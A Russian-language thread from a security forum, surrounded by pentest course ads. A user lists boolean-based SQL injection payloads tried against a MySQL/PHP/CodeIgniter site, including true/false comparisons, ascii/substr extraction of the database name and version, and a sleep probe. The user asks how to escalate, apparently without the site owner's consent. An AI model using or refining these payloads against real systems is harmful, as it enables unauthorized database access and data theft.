• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Есть возможность раскрутить Sql Injetion?

wallhack

Active member
20.08.2022
38
0
Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?
 
Ну так надо крутить, чтоб понять, есть ли возможность ) Ясновидящих тут нет.
Вооружайся мануалами, шпаргалками, статьями из инета, документацией по mysql и крути.
 
Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?
На соседнем форуме есть топик " ". Там могут помочь
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD